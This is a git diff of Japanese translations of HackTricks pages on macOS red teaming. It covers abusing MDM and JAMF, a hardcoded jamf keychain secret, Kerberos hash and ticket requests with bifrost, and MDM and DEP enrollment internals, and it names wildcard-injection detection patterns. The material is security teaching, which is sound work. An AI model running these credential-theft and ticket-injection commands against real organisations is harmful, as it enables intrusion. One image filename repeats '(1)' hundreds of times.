可能な限り、バックアップ/メンテナンスジョブをルートではなく特権のないサービスアカウントとして実行します。 +5. **監視**: Elastic の事前構築されたルール *Potential Shell via Wildcard Injection* は、`tar --checkpoint=*`、`rsync -e*`、または `zip --unzip-command` の後にすぐにシェル子プロセスが続くことを探します。EQL クエリは他の EDR に適応できます。 --- ## 参考文献 -* Elastic Security – Potential Shell via Wildcard Injection Detected rule (最終更新 2025) +* Elastic Security – Potential Shell via Wildcard Injection Detected ルール (最終更新 2025) * Rutger Flohil – “macOS — Tar wildcard injection” (2024年12月18日) +* GTFOBins – [tcpdump](https://gtfobins.github.io/gtfobins/tcpdump/) +* FiberGateway GR241AG – [Full Exploit Chain](https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-red-teaming/README.md b/src/macos-hardening/macos-red-teaming/README.md index 3ca16379a..dcdfced22 100644 --- a/src/macos-hardening/macos-red-teaming/README.md +++ b/src/macos-hardening/macos-red-teaming/README.md @@ -2,12 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} + ## MDMの悪用 - JAMF Pro: `jamf checkJSSConnection` - Kandji -管理プラットフォームにアクセスするために**管理者資格情報を侵害**することができれば、マシンにマルウェアを配布することで**すべてのコンピュータを侵害する可能性があります**。 +管理プラットフォームにアクセスするために**管理者資格情報を侵害**することができれば、マシンにマルウェアを配布することで**すべてのコンピュータを潜在的に侵害**することができます。 MacOS環境でのレッドチーミングには、MDMの動作についての理解が非常に推奨されます: @@ -15,11 +16,11 @@ MacOS環境でのレッドチーミングには、MDMの動作についての理 macos-mdm/ {{#endref}} -### C2としてのMDMの使用 +### MDMをC2として使用する -MDMは、プロファイルのインストール、クエリ、削除、アプリケーションのインストール、ローカル管理者アカウントの作成、ファームウェアパスワードの設定、FileVaultキーの変更を行う権限を持っています... +MDMは、プロファイルのインストール、クエリまたは削除、アプリケーションのインストール、ローカル管理者アカウントの作成、ファームウェアパスワードの設定、FileVaultキーの変更を行う権限を持っています... -独自のMDMを運営するには、**ベンダーによって署名されたCSRが必要**で、[**https://mdmcert.download/**](https://mdmcert.download/)で取得を試みることができます。また、Appleデバイス用の独自のMDMを運営するには、[**MicroMDM**](https://github.com/micromdm/micromdm)を使用できます。 +独自のMDMを運営するには、**ベンダーによって署名されたCSRが必要**で、これを[**https://mdmcert.download/**](https://mdmcert.download/)で取得しようとすることができます。Appleデバイス用の独自のMDMを運営するには、[**MicroMDM**](https://github.com/micromdm/micromdm)を使用できます。 ただし、登録されたデバイスにアプリケーションをインストールするには、開発者アカウントによって署名されている必要があります... しかし、MDM登録時に**デバイスはMDMのSSL証明書を信頼されたCAとして追加**するため、今では何でも署名できます。 @@ -29,7 +30,7 @@ MDMは、プロファイルのインストール、クエリ、削除、アプ ### JAMF PROの悪用 -JAMFは**カスタムスクリプト**(システム管理者によって開発されたスクリプト)、**ネイティブペイロード**(ローカルアカウントの作成、EFIパスワードの設定、ファイル/プロセスの監視...)および**MDM**(デバイスの構成、デバイス証明書...)を実行できます。 +JAMFは**カスタムスクリプト**(システム管理者によって開発されたスクリプト)、**ネイティブペイロード**(ローカルアカウントの作成、EFIパスワードの設定、ファイル/プロセスの監視...)、および**MDM**(デバイスの構成、デバイス証明書...)を実行できます。 #### JAMF自己登録 @@ -45,12 +46,12 @@ JAMFは**カスタムスクリプト**(システム管理者によって開発
-**`jamf`**バイナリには、キーチェーンを開くための秘密が含まれており、発見時には**誰もが共有**していました。それは:**`jk23ucnq91jfu9aj`**です。\ +**`jamf`**バイナリには、発見時に**共有**されていたキーチェーンを開くための秘密が含まれており、それは**`jk23ucnq91jfu9aj`**でした。\ さらに、jamfは**`/Library/LaunchAgents/com.jamf.management.agent.plist`**に**LaunchDaemon**として**持続**します。 -#### JAMFデバイスタ takeover +#### JAMFデバイスタケオーバー -**JSS**(Jamf Software Server)**URL**は、**`jamf`**が使用するもので、**`/Library/Preferences/com.jamfsoftware.jamf.plist`**にあります。\ +**JSS**(Jamf Software Server)**URL**は、**`jamf`**が使用する**`/Library/Preferences/com.jamfsoftware.jamf.plist`**にあります。\ このファイルには基本的にURLが含まれています: ```bash plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist @@ -59,7 +60,7 @@ plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist is_virtual_machine jss_url -https://halbornasd.jamfcloud.com/ +https://subdomain-company.jamfcloud.com/ last_management_framework_change_id 4 [...] @@ -71,28 +72,28 @@ sudo jamf policy -id 0 # TODO: There is an ID, maybe it's possible to have the real jamf connection and another one to the C2 ``` -#### JAMFなりすまし +#### JAMF なりすまし -デバイスとJMF間の**通信をなりすます**には、以下が必要です: +デバイスと JMF の間の **通信をなりすます** には、以下が必要です: -- デバイスの**UUID**: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` -- デバイス証明書を含む**JAMFキーチェーン**: `/Library/Application\ Support/Jamf/JAMF.keychain` +- デバイスの **UUID**: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` +- デバイス証明書を含む **JAMF キーチェーン**: `/Library/Application\ Support/Jamf/JAMF.keychain` -この情報をもとに、**盗まれた**ハードウェア**UUID**を持ち、**SIPを無効にした**VMを**作成**し、**JAMFキーチェーンをドロップ**し、Jamf**エージェントをフック**してその情報を盗みます。 +この情報をもとに、**盗まれた**ハードウェア **UUID** を持ち、**SIP を無効にした** VM を作成し、**JAMF キーチェーンをドロップ**し、Jamf **エージェントをフック**してその情報を盗みます。 #### 秘密の盗難

a

-管理者がJamfを介して実行したい**カスタムスクリプト**を監視するために、`/Library/Application Support/Jamf/tmp/`の場所を監視することもできます。これらのスクリプトは**ここに配置され、実行され、削除されます**。これらのスクリプトには**資格情報が含まれている可能性があります**。 +また、管理者が Jamf 経由で実行したい **カスタムスクリプト** のために、`/Library/Application Support/Jamf/tmp/` の場所を監視することもできます。これらのスクリプトは **ここに配置され、実行され、削除されます**。これらのスクリプトには **資格情報** が含まれている可能性があります。 -ただし、**資格情報**はこれらのスクリプトに**パラメータ**として渡される可能性があるため、`ps aux | grep -i jamf`を監視する必要があります(ルートでなくても)。 +ただし、**資格情報** はこれらのスクリプトに **パラメータ** として渡される可能性があるため、`ps aux | grep -i jamf` を監視する必要があります(ルートでなくても)。 -スクリプト[**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py)は、新しいファイルが追加されたり、新しいプロセス引数が追加されたりするのをリッスンできます。 +スクリプト [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) は、新しいファイルが追加されるのをリッスンし、新しいプロセス引数を監視できます。 -### macOSリモートアクセス +### macOS リモートアクセス -また、**MacOS**の「特別な」**ネットワーク****プロトコル**についても: +また、**MacOS** の "特別な" **ネットワーク** **プロトコル** について: {{#ref}} ../macos-security-and-privilege-escalation/macos-protocols.md @@ -100,7 +101,7 @@ sudo jamf policy -id 0 ## Active Directory -場合によっては、**MacOSコンピュータがADに接続されている**ことがあります。このシナリオでは、慣れているようにアクティブディレクトリを**列挙**しようとするべきです。以下のページで**ヘルプ**を見つけてください: +場合によっては、**MacOS コンピュータが AD に接続されている**ことがあります。このシナリオでは、慣れているようにアクティブディレクトリを **列挙** しようとするべきです。以下のページで **ヘルプ** を見つけてください: {{#ref}} ../../network-services-pentesting/pentesting-ldap.md @@ -114,30 +115,30 @@ sudo jamf policy -id 0 ../../network-services-pentesting/pentesting-kerberos-88/ {{#endref}} -役立つ可能性のある**ローカルMacOSツール**は`dscl`です: +役立つ可能性のある **ローカル MacOS ツール** は `dscl` です: ```bash dscl "/Active Directory/[Domain]/All Domains" ls / ``` また、ADを自動的に列挙し、Kerberosを操作するためにMacOS用に準備されたツールがあります: - [**Machound**](https://github.com/XMCyber/MacHound): MacHoundは、MacOSホスト上のActive Directory関係を収集および取り込むことを可能にするBloodhound監査ツールの拡張です。 -- [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrostは、macOS上のHeimdal krb5 APIと対話するために設計されたObjective-Cプロジェクトです。このプロジェクトの目標は、ターゲットに他のフレームワークやパッケージを必要とせずに、ネイティブAPIを使用してmacOSデバイス上のKerberosに関するセキュリティテストを向上させることです。 +- [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrostは、macOS上のHeimdal krb5 APIと対話するために設計されたObjective-Cプロジェクトです。このプロジェクトの目標は、ターゲットに他のフレームワークやパッケージを必要とせずに、ネイティブAPIを使用してmacOSデバイス上のKerberosに関するセキュリティテストを改善することです。 - [**Orchard**](https://github.com/its-a-feature/Orchard): Active Directory列挙を行うためのJavaScript for Automation (JXA)ツールです。 ### ドメイン情報 ```bash echo show com.apple.opendirectoryd.ActiveDirectory | scutil ``` -### ユーザー +### Users MacOSのユーザーには3種類があります: -- **ローカルユーザー** — ローカルOpenDirectoryサービスによって管理され、Active Directoryとは一切接続されていません。 -- **ネットワークユーザー** — DCサーバーに接続して認証を受ける必要がある揮発性のActive Directoryユーザーです。 +- **ローカルユーザー** — ローカルOpenDirectoryサービスによって管理されており、Active Directoryとは接続されていません。 +- **ネットワークユーザー** — 認証のためにDCサーバーへの接続が必要な揮発性のActive Directoryユーザーです。 - **モバイルユーザー** — 認証情報とファイルのローカルバックアップを持つActive Directoryユーザーです。 ユーザーとグループに関するローカル情報は、フォルダー _/var/db/dslocal/nodes/Default._ に保存されています。\ -例えば、_mark_ というユーザーに関する情報は _/var/db/dslocal/nodes/Default/users/mark.plist_ に保存されており、_admin_ グループに関する情報は _/var/db/dslocal/nodes/Default/groups/admin.plist_ にあります。 +例えば、_mark_というユーザーに関する情報は _/var/db/dslocal/nodes/Default/users/mark.plist_ に保存されており、_admin_というグループに関する情報は _/var/db/dslocal/nodes/Default/groups/admin.plist_ にあります。 HasSessionおよびAdminToエッジを使用することに加えて、**MacHoundはBloodhoundデータベースに3つの新しいエッジを追加します**: @@ -165,11 +166,11 @@ dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]" #Domain Information dsconfigad -show ``` -[https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) +More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) ### Computer$ パスワード -次の方法でパスワードを取得します: +Get passwords using: ```bash bifrost --action askhash --username [name] --password [password] --domain [domain] ``` @@ -182,7 +183,7 @@ bifrost --action askhash --username [name] --password [password] --domain [domai bifrost --action asktgt --username [user] --domain [domain.com] \ --hash [hash] --enctype [enctype] --keytab [/path/to/keytab] ``` -TGTが収集されると、次のコマンドで現在のセッションに注入することができます: +TGTが収集されると、次のコマンドで現在のセッションに注入することが可能です: ```bash bifrost --action asktgt --username test_lab_admin \ --hash CF59D3256B62EE655F6430B0F80701EE05A0885B8B52E9C2480154AFA62E78 \ @@ -193,7 +194,7 @@ bifrost --action asktgt --username test_lab_admin \ bifrost --action asktgs --spn [service] --domain [domain.com] \ --username [user] --hash [hash] --enctype [enctype] ``` -取得したサービスチケットを使用して、他のコンピュータの共有にアクセスしようとすることが可能です: +取得したサービスチケットを使用して、他のコンピュータの共有にアクセスを試みることができます: ```bash smbutil view //computer.fqdn mount -t smbfs //server/folder /local/mount/point @@ -208,13 +209,13 @@ macos-keychain.md ## 外部サービス -MacOSのレッドチーミングは、通常**MacOSがいくつかの外部プラットフォームと直接統合されている**ため、通常のWindowsレッドチーミングとは異なります。MacOSの一般的な構成は、**OneLoginで同期された資格情報を使用してコンピュータにアクセスし、OneLoginを介していくつかの外部サービス**(github、awsなど)にアクセスすることです。 +MacOSのレッドチーミングは、通常のWindowsのレッドチーミングとは異なり、**MacOSは通常、いくつかの外部プラットフォームと直接統合されています**。 MacOSの一般的な構成は、**OneLoginで同期された資格情報を使用してコンピュータにアクセスし、OneLoginを介していくつかの外部サービス**(github、awsなど)にアクセスすることです。 ## その他のレッドチーム技術 ### Safari -Safariでファイルがダウンロードされると、それが「安全な」ファイルであれば、**自動的に開かれます**。例えば、**zipファイルをダウンロード**すると、自動的に解凍されます: +Safariでファイルがダウンロードされると、それが「安全な」ファイルであれば、**自動的に開かれます**。 例えば、**zipファイルをダウンロード**すると、自動的に解凍されます:
diff --git a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md index 7d40c1cdf..2b66ee844 100644 --- a/src/macos-hardening/macos-red-teaming/macos-mdm/README.md +++ b/src/macos-hardening/macos-red-teaming/macos-mdm/README.md @@ -11,15 +11,15 @@ ### **MDM (モバイルデバイス管理) 概要** -[モバイルデバイス管理](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) は、スマートフォン、ラップトップ、タブレットなどのさまざまなエンドユーザーデバイスを監視するために利用されます。特にAppleのプラットフォーム(iOS、macOS、tvOS)においては、一連の専門的な機能、API、および実践が含まれます。MDMの運用は、商業的に入手可能またはオープンソースの互換性のあるMDMサーバーに依存し、[MDMプロトコル](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)をサポートする必要があります。主なポイントは以下の通りです: +[モバイルデバイス管理](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) は、スマートフォン、ラップトップ、タブレットなどのさまざまなエンドユーザーデバイスを監視するために利用されます。特にAppleのプラットフォーム(iOS、macOS、tvOS)においては、一連の専門的な機能、API、および実践が含まれます。MDMの運用は、商業的に利用可能またはオープンソースの互換性のあるMDMサーバーに依存し、[MDMプロトコル](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)をサポートする必要があります。主なポイントは以下の通りです: -- デバイスの集中管理。 +- デバイスに対する集中管理。 - MDMプロトコルに準拠したMDMサーバーへの依存。 -- MDMサーバーがデバイスにさまざまなコマンドを送信できる能力、例えば、リモートデータ消去や設定のインストールなど。 +- MDMサーバーがデバイスに対してさまざまなコマンドを送信できる能力、例えば、リモートデータ消去や設定のインストールなど。 ### **DEP (デバイス登録プログラム) の基本** -Appleが提供する[デバイス登録プログラム](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) は、iOS、macOS、tvOSデバイスのモバイルデバイス管理(MDM)を簡素化し、ゼロタッチ構成を可能にします。DEPは登録プロセスを自動化し、デバイスが箱から出してすぐに動作可能で、最小限のユーザーまたは管理者の介入で済むようにします。重要な側面は以下の通りです: +Appleが提供する[デバイス登録プログラム](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) は、iOS、macOS、tvOSデバイスのモバイルデバイス管理(MDM)を簡素化し、ゼロタッチ構成を可能にします。DEPは登録プロセスを自動化し、デバイスが箱から出してすぐに動作可能となるようにし、最小限のユーザーまたは管理者の介入で済みます。重要な側面は以下の通りです: - デバイスが初回起動時に事前定義されたMDMサーバーに自動的に登録されることを可能にします。 - 主に新しいデバイスに有益ですが、再構成中のデバイスにも適用可能です。 @@ -27,7 +27,7 @@ Appleが提供する[デバイス登録プログラム](https://www.apple.com/bu ### **セキュリティの考慮事項** -DEPによって提供される登録の容易さは有益ですが、セキュリティリスクも伴うことに注意が必要です。MDM登録に対する保護措置が適切に施されていない場合、攻撃者はこの簡素化されたプロセスを利用して、自分のデバイスを組織のMDMサーバーに登録し、企業デバイスを装う可能性があります。 +DEPによって提供される登録の容易さは有益ですが、セキュリティリスクも伴います。MDM登録に対する保護措置が適切に施されていない場合、攻撃者はこの簡素化されたプロセスを利用して、自身のデバイスを組織のMDMサーバーに登録し、企業デバイスを装う可能性があります。 > [!CAUTION] > **セキュリティ警告**: 簡素化されたDEP登録は、適切な保護策が講じられていない場合、組織のMDMサーバーに対する不正なデバイス登録を許可する可能性があります。 @@ -35,20 +35,20 @@ DEPによって提供される登録の容易さは有益ですが、セキュ ### SCEP (シンプル証明書登録プロトコル) とは? - TLSやHTTPSが広まる前に作成された比較的古いプロトコルです。 -- クライアントが証明書を取得するために**証明書署名要求** (CSR) を送信する標準化された方法を提供します。クライアントはサーバーに署名された証明書を要求します。 +- クライアントが証明書を取得するための**証明書署名要求** (CSR) を送信するための標準化された方法を提供します。クライアントはサーバーに署名された証明書を要求します。 ### 構成プロファイル (モバイル構成ファイル) とは? -- Appleによる**システム構成の設定/強制**の公式な方法です。 +- Appleの公式な**システム構成の設定/強制方法**です。 - 複数のペイロードを含むことができるファイル形式です。 - プロパティリスト(XML形式)に基づいています。 -- 「その起源を検証し、整合性を確保し、内容を保護するために署名および暗号化できます。」 基本 — ページ70, iOSセキュリティガイド, 2018年1月。 +- 「その出所を検証し、整合性を確保し、内容を保護するために署名および暗号化できます。」 基本 — ページ70, iOSセキュリティガイド, 2018年1月。 ## プロトコル ### MDM -- APNs (**Appleサーバー**) + RESTful API (**MDM** **ベンダー**サーバー) の組み合わせ +- APNs (**Appleサーバー**) + RESTful API (**MDMベンダー**サーバー) の組み合わせ - **通信**は**デバイス**と**デバイス管理製品**に関連するサーバーの間で行われます - **コマンド**はMDMからデバイスに**plistエンコードされた辞書**で配信されます - すべて**HTTPS**経由です。MDMサーバーは(通常)ピン留めされます。 @@ -56,11 +56,11 @@ DEPによって提供される登録の容易さは有益ですが、セキュ ### DEP -- **3つのAPI**: 1つはリセラー用、1つはMDMベンダー用、1つはデバイスID用(未文書): -- いわゆる[DEP "クラウドサービス" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)。これはMDMサーバーが特定のデバイスにDEPプロファイルを関連付けるために使用します。 +- **3つのAPI**: 1つはリセラー用、1つはMDMベンダー用、1つはデバイスID用(未文書化): +- いわゆる[DEP "クラウドサービス" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf)。これはMDMサーバーが特定のデバイスにDEPプロファイルを関連付けるために使用されます。 - [Apple認定リセラーが使用するDEP API](https://applecareconnect.apple.com/api-docs/depuat/html/WSImpManual.html)は、デバイスを登録し、登録状況を確認し、取引状況を確認します。 -- 未文書のプライベートDEP API。これはAppleデバイスが自分のDEPプロファイルを要求するために使用します。macOSでは、`cloudconfigurationd`バイナリがこのAPIを介して通信する責任があります。 -- より現代的で**JSON**ベース(vs. plist) +- 未文書化のプライベートDEP API。これはAppleデバイスが自分のDEPプロファイルを要求するために使用されます。macOSでは、`cloudconfigurationd`バイナリがこのAPIを介して通信する責任があります。 +- より現代的で**JSON**ベース(plistに対して) - AppleはMDMベンダーに**OAuthトークン**を付与します **DEP "クラウドサービス" API** @@ -93,7 +93,7 @@ macos-serial-number.md ![](<../../../images/image (694).png>) -ファイル`/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd`は、登録プロセスの**高レベルの「ステップ」**と見なされる関数をエクスポートします。 +ファイル `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` は、登録プロセスの**高レベルの「ステップ」**と見なされる関数をエクスポートします。 ### ステップ4: DEPチェックイン - アクティベーションレコードの取得 @@ -101,13 +101,13 @@ macos-serial-number.md ![](<../../../images/image (1044).png>) -または`sudo profiles show -type enrollment`を実行したときに。 +または `sudo profiles show -type enrollment` を実行したときに。 - **デバイスがDEP対応かどうかを判断** - アクティベーションレコードは**DEP「プロファイル」**の内部名です - デバイスがインターネットに接続されるとすぐに始まります - **`CPFetchActivationRecord`**によって駆動されます -- **`cloudconfigurationd`**によってXPCを介して実装されます。デバイスが初めて起動されたときの**「セットアップアシスタント」**または**`profiles`**コマンドがこのデーモンに連絡してアクティベーションレコードを取得します。 +- **`cloudconfigurationd`**によってXPC経由で実装されます。デバイスが初めて起動されたときの**「セットアップアシスタント」**または**`profiles`**コマンドがこのデーモンに連絡してアクティベーションレコードを取得します。 - LaunchDaemon(常にrootとして実行) アクティベーションレコードを取得するために**`MCTeslaConfigurationFetcher`**によって実行されるいくつかのステップに従います。このプロセスは**Absinthe**という暗号化を使用します。 @@ -120,7 +120,7 @@ macos-serial-number.md 1. POST [https://iprofiles.apple.com/session](https://iprofiles.apple.com/session) 4. セッションを確立(**`NACKeyEstablishment`**) 5. リクエストを行う -1. POST [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile)にデータ`{ "action": "RequestProfileConfiguration", "sn": "" }`を送信 +1. POST [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) にデータ `{ "action": "RequestProfileConfiguration", "sn": "" }` を送信 2. JSONペイロードはAbsintheで暗号化されます(**`NACSign`**) 3. すべてのリクエストはHTTPs経由で行われ、組み込みのルート証明書が使用されます @@ -128,76 +128,20 @@ macos-serial-number.md レスポンスは、以下のような重要なデータを含むJSON辞書です: -- **url**: アクティベーションプロファイルのためのMDMベンダーホストのURL +- **url**: アクティベーションプロファイルのMDMベンダーホストのURL - **anchor-certs**: 信頼されたアンカーとして使用されるDER証明書の配列 ### **ステップ5: プロファイルの取得** ![](<../../../images/image (444).png>) -- **DEPプロファイルで提供されたurl**にリクエストが送信されます。 +- **DEPプロファイル**で提供された**url**にリクエストが送信されます。 - 提供された場合、**アンカー証明書**が**信頼性を評価**するために使用されます。 -- リマインダー: **DEPプロファイルのanchor_certsプロパティ** +- リマインダー: DEPプロファイルの**anchor_certs**プロパティ - **リクエストはデバイス識別を含むシンプルな.plist**です - 例: **UDID、OSバージョン**。 - CMS署名、DERエンコード -- **デバイスID証明書(APNSからの)**を使用して署名されます。 -- **証明書チェーン**には期限切れの**Apple iPhone Device CA**が含まれます。 +- **デバイスID証明書(APNSからの)**を使用して署名されています。 +- **証明書チェーン**には期限切れの**Apple iPhone Device CA**が含まれています。 -![](<../../../images/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2).png>) - -### ステップ6: プロファイルのインストール - -- 取得後、**プロファイルはシステムに保存されます** -- このステップは自動的に開始されます(**セットアップアシスタント**にいる場合) -- **`CPInstallActivationProfile`**によって駆動されます -- XPCを介してmdmclientによって実装されます -- LaunchDaemon(rootとして)またはLaunchAgent(ユーザーとして)、コンテキストに応じて -- 構成プロファイルにはインストールする複数のペイロードがあります -- フレームワークはプロファイルをインストールするためのプラグインベースのアーキテクチャを持っています -- 各ペイロードタイプはプラグインに関連付けられています -- XPC(フレームワーク内)または従来のCocoa(ManagedClient.app内)である可能性があります -- 例: -- 証明書ペイロードはCertificateService.xpcを使用します - -通常、MDMベンダーが提供する**アクティベーションプロファイル**には**以下のペイロード**が含まれます: - -- `com.apple.mdm`: デバイスをMDMに**登録**するため -- `com.apple.security.scep`: デバイスに**クライアント証明書**を安全に提供するため。 -- `com.apple.security.pem`: デバイスのシステムキーチェーンに**信頼されたCA証明書**をインストールするため。 -- MDMペイロードのインストールは、文書内の**MDMチェックイン**に相当します。 -- ペイロードには**主要なプロパティ**が含まれます: -- - MDMチェックインURL(**`CheckInURL`**) -- MDMコマンドポーリングURL(**`ServerURL`**) + それをトリガーするAPNsトピック -- MDMペイロードをインストールするために、リクエストが**`CheckInURL`**に送信されます -- **`mdmclient`**で実装されています -- MDMペイロードは他のペイロードに依存することがあります -- 特定の証明書にリクエストをピン留めすることを許可します: -- プロパティ:**`CheckInURLPinningCertificateUUIDs`** -- プロパティ:**`ServerURLPinningCertificateUUIDs`** -- PEMペイロードを介して配信されます -- デバイスにアイデンティティ証明書を付与することを許可します: -- プロパティ:IdentityCertificateUUID -- SCEPペイロードを介して配信されます - -### **ステップ7: MDMコマンドのリスニング** - -- MDMチェックインが完了した後、ベンダーは**APNsを使用してプッシュ通知を発行**できます -- 受信時、**`mdmclient`**によって処理されます -- MDMコマンドをポーリングするために、リクエストがServerURLに送信されます -- 以前にインストールされたMDMペイロードを利用します: -- **`ServerURLPinningCertificateUUIDs`**によるリクエストのピン留め -- **`IdentityCertificateUUID`**によるTLSクライアント証明書 - -## 攻撃 - -### 他の組織へのデバイスの登録 - -前述のように、デバイスを組織に登録しようとするには、**その組織に属するシリアル番号のみが必要**です。デバイスが登録されると、いくつかの組織は新しいデバイスに機密データをインストールします:証明書、アプリケーション、WiFiパスワード、VPN設定など[こちら](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf)を参照してください。\ -したがって、登録プロセスが適切に保護されていない場合、これは攻撃者にとって危険な入り口となる可能性があります: - -{{#ref}} -enrolling-devices-in-other-organisations.md -{{#endref}} - -{{#include ../../../banners/hacktricks-training.md}} +![](<../../../images/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) 